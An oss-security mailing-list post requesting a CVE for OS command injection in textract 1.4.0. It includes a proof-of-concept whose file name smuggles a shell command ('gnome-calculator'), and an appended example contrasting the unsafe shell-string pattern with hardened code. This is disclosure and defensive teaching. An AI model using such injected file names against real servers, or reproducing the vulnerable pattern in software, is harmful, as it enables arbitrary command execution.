Message-ID: <CAO8=cJ-0zddSyndp=8ot8BHxyeC2r0Ln0nQvbFx0JQ3Dpg=0dA@mail.gmail.com>
Date: Thu, 20 Oct 2016 17:40:50 -0400
From: Pierre Ernst <pernst@...esforce.com>
To: oss-security@...ts.openwall.com
Subject: CVE request - textract 1.4.0 - OS Command Injection
The Python textract component (
https://github.com/deanmalmgren/textract/tree/v1.4.0) is vulnerable to OS
command injection.
This fork contains a fix:
https://github.com/pierre-ernst/textract
Parsing a file with a malicious name leads to arbitrary OS command
injection; this is especially risky when parsing user-supplied files on a
server (e.g. uploaded files).
PoC:
import textract
import sys
import os
# create a file with a malicious name and arbitrary content
fileName = './test";gnome-calculator;#.pdf'
file = open(fileName,'w+')
file.write('Pierre Ernst, Salesforce')
file.close()
# parse newly created file
text = textract.process(fileName)
print text
# cleanup
os.remove(fileName)
--
Pierre Ernst
Salesforce
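An added example (not from the report or from textract itself) that puts the vulnerable pattern next to a hardened one. It assumes textract 1.4.0 interpolated the filename into a command string executed with shell=True, reuses the PoC's filename with the payload swapped for a harmless echo, and uses a python -c stand-in instead of pdftotext so it runs without the converter installed.

```python
"""Safe vs unsafe ways to hand a filename to an external converter."""
import os
import shlex
import subprocess
import sys
import tempfile

# Constructed sample: the PoC's filename shape, payload replaced by a harmless echo.
MALICIOUS_NAME = './test";echo INJECTED;#.pdf'


def build_shell_command_unsafe(filename):
    """Vulnerable pattern (assumed to mirror textract 1.4.0): the filename is
    pasted into a command string that is later run with shell=True. A double
    quote in the name closes the quoting and the remainder becomes shell
    syntax. Built here only to make the defect visible; never executed."""
    return 'pdftotext "%s" -' % filename


def build_shell_command_quoted(filename):
    """If a shell string is unavoidable, shlex.quote() turns the filename into
    a single shell word regardless of its content."""
    return 'pdftotext %s -' % shlex.quote(filename)


def convert_safe(filename):
    """Hardened pattern: the filename is one argv element and no shell is
    involved, so metacharacters in it are never interpreted. The converter
    is a stand-in (python -c) that prints the file's content."""
    stand_in = "import sys; print(open(sys.argv[1]).read(), end='')"
    proc = subprocess.run([sys.executable, "-c", stand_in, filename],
                          capture_output=True, text=True, check=True)
    return proc.stdout


def demo():
    """Create a file whose name carries the payload and convert it safely."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, MALICIOUS_NAME)
        with open(path, "w") as f:
            f.write("harmless content")
        return convert_safe(path)


if __name__ == "__main__":
    print(build_shell_command_unsafe(MALICIOUS_NAME))
    print(build_shell_command_quoted(MALICIOUS_NAME))
    print(demo())
```

The filename requires a POSIX filesystem, since `"` and `;` are not legal in Windows file names.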